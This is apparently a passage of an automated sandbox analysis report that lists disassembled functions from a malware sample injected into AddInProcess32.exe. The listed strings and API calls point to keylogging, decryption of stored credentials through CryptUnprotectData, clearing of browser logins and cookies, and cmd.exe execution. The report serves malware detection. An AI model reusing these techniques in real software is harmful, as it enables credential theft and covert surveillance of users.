                                                                                  • API ID: _free$FileModuleName
                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  • API String ID: 2506810119-760905667
                                                                                  • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                                                                  • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
                                                                                  • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
                                                                                  • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
                                                                                  Function 00419675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                                                    • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                                                    • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                                                    • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
                                                                                  • _wcslen.LIBCMT ref: 00419744
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                  • String ID: .exe$program files (x86)\$program files\
                                                                                  • API String ID: 37874593-1203593143
                                                                                  • Opcode ID: 10bc18928e6e61956a1164a1b65d24a3f41bb37fdc51d01d4daa4ba9d64b36f6
                                                                                  • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                                                                                  • Opcode Fuzzy Hash: 10bc18928e6e61956a1164a1b65d24a3f41bb37fdc51d01d4daa4ba9d64b36f6
                                                                                  • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                                                                                  Function 0040A0B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                  • wsprintfW.USER32 ref: 0040A13F
                                                                                    • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EventLocalTimewsprintf
                                                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                  • API String ID: 1497725170-1359877963
                                                                                  • Opcode ID: f3ab8f0dafa5a9dc05243b2c817d718be513179a9901e99beb06aebd384142ca
                                                                                  • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                                                                  • Opcode Fuzzy Hash: f3ab8f0dafa5a9dc05243b2c817d718be513179a9901e99beb06aebd384142ca
                                                                                  • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                                                                                  Function 00409E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                    • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 00409EB7
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 00409EC3
                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                                  • String ID: Online Keylogger Started
                                                                                  • API String ID: 112202259-1258561607
                                                                                  • Opcode ID: 5fa459dc9ce629ff8a70036c08f5d98878fb93e531b8a2c19081d6b25492cc47
                                                                                  • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                                                                                  • Opcode Fuzzy Hash: 5fa459dc9ce629ff8a70036c08f5d98878fb93e531b8a2c19081d6b25492cc47
                                                                                  • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                                                                                  Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: CryptUnprotectData$crypt32
                                                                                  • API String ID: 2574300362-2380590389
                                                                                  • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                                                                  • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                                                                                  • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                                                                  • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                                                                                  Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                                                                  • CloseHandle.KERNEL32(?), ref: 004051AA
                                                                                  • SetEvent.KERNEL32(?), ref: 004051B9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                  • String ID: Connection Timeout
                                                                                  • API String ID: 2055531096-499159329
                                                                                  • Opcode ID: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
                                                                                  • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                                                                                  • Opcode Fuzzy Hash: 63802c29894aba1c9235576c830eb551c7f601f2e83192e88b92a5e109e54835
                                                                                  • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                                                                                  Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw
                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                  • API String ID: 2005118841-1866435925
                                                                                  • Opcode ID: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
                                                                                  • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                                                                                  • Opcode Fuzzy Hash: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
                                                                                  • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                                                                                  Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID: /C $cmd.exe$open
                                                                                  • API String ID: 587946157-3896048727
                                                                                  • Opcode ID: 14c4ca3e9eccff4f89628894af616bed7b41f6199bc2d712c858cafb70033ac4
                                                                                  • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                                                                                  • Opcode Fuzzy Hash: 14c4ca3e9eccff4f89628894af616bed7b41f6199bc2d712c858cafb70033ac4
                                                                                  • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                                                                                  Function 00412006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                                                                  Strings
                                                                                  • http\shell\open\command, xrefs: 00412026
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: http\shell\open\command
                                                                                  • API String ID: 3677997916-1487954565
                                                                                  • Opcode ID: 0e8278834a88dd125b5a4e0272649bf262eb2ce361776dde88d9fd2e8eebaada
                                                                                  • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                                                                                  • Opcode Fuzzy Hash: 0e8278834a88dd125b5a4e0272649bf262eb2ce361776dde88d9fd2e8eebaada
                                                                                  • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                                                                                  Function 00412204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,004721E8), ref: 0041220F
                                                                                  • RegSetValueExW.ADVAPI32(00472200,00000000,00000000,?,00000000,00000000,00472200,?,?,00000001), ref: 0041223E
                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 00412249
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID: pth_unenc
                                                                                  • API String ID: 1818849710-4028850238
                                                                                  • Opcode ID: a2b3254e269ed075d9dc061201a3f9a1afffdab784d1a4dfdfe539f8f512937d
                                                                                  • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                                                                  • Opcode Fuzzy Hash: a2b3254e269ed075d9dc061201a3f9a1afffdab784d1a4dfdfe539f8f512937d
                                                                                  • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                                                                                  Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                                                                    • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                                                                    • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                  • String ID: bad locale name
                                                                                  • API String ID: 3628047217-1405518554
                                                                                  • Opcode ID: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
                                                                                  • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                                                                                  • Opcode Fuzzy Hash: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
                                                                                  • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                                                                                  Function 004013F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401403
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: GetCursorInfo$User32.dll
                                                                                  • API String ID: 1646373207-2714051624
                                                                                  • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                                                                  • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                                                                                  • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                                                                  • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                                                                                  Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetLastInputInfo$User32.dll
                                                                                  • API String ID: 2574300362-1519888992
                                                                                  • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                                                                  • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                                                                                  • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                                                                  • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                                                                                  Function 00448C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __alldvrm$_strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 1036877536-0
                                                                                  • Opcode ID: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
                                                                                  • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                                                                                  • Opcode Fuzzy Hash: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
                                                                                  • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                                                                                  Function 00453DF4 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID:
                                                                                  • API String ID: 269201875-0
                                                                                  • Opcode ID: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
                                                                                  • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                                                                  • Opcode Fuzzy Hash: e48a72c45575700ceddfc4a13269a7974e50b6c85b9f24d2dc50821f03aae928
                                                                                  • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                                                                  Function 0043FD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                                                                  • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                                                                                  • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                                                                  • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                                                                                  Function 00404CA3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                                                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 3360349984-0
                                                                                  • Opcode ID: 065d974023d608d9e5a1c7ca2dcb3521b24bc23c5e7a56f3f776532f1b505451
                                                                                  • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
                                                                                  • Opcode Fuzzy Hash: 065d974023d608d9e5a1c7ca2dcb3521b24bc23c5e7a56f3f776532f1b505451
                                                                                  • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
                                                                                  Function 0040AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                                                                  • Cleared browsers logins and cookies., xrefs: 0040B036
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                  • API String ID: 3472027048-1236744412
                                                                                  • Opcode ID: 777192976b82e5c909fdb28c8847f6a84e877f9bb292357d0588c1b5c111be7a
                                                                                  • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                                                                  • Opcode Fuzzy Hash: 777192976b82e5c909fdb28c8847f6a84e877f9bb292357d0588c1b5c111be7a
                                                                                  • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                                                                  Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
                                                                                    • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
                                                                                    • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQuerySleepValue
                                                                                  • String ID: H"G$exepath$!G
                                                                                  • API String ID: 4119054056-2148977334
                                                                                  • Opcode ID: c6b7fd93e55878c55fbeb38dd929213cc60599e209660ca03378386740ff024a
                                                                                  • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                                                                  • Opcode Fuzzy Hash: c6b7fd93e55878c55fbeb38dd929213cc60599e209660ca03378386740ff024a
                                                                                  • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                                                                  Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                                                                    • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                                                                    • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040955A
                                                                                  • Sleep.KERNEL32(00000064), ref: 004095F5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$SleepText$ForegroundLength
                                                                                  • String ID: [ $ ]
                                                                                  • API String ID: 3309952895-93608704
                                                                                  • Opcode ID: 50bd45538fc1325d318fbbf77384be1d7cd884a7cd54cef18345d66a056de0e4
                                                                                  • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                                                                  • Opcode Fuzzy Hash: 50bd45538fc1325d318fbbf77384be1d7cd884a7cd54cef18345d66a056de0e4
                                                                                  • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                                                                  Function 00440F33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
                                                                                  • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                                                                  • Opcode Fuzzy Hash: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
                                                                                  • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                                                                  Function 00440FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
                                                                                  • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                                                                                  • Opcode Fuzzy Hash: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
                                                                                  • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                                                                                  Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                                                                  • GetLastError.KERNEL32(?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
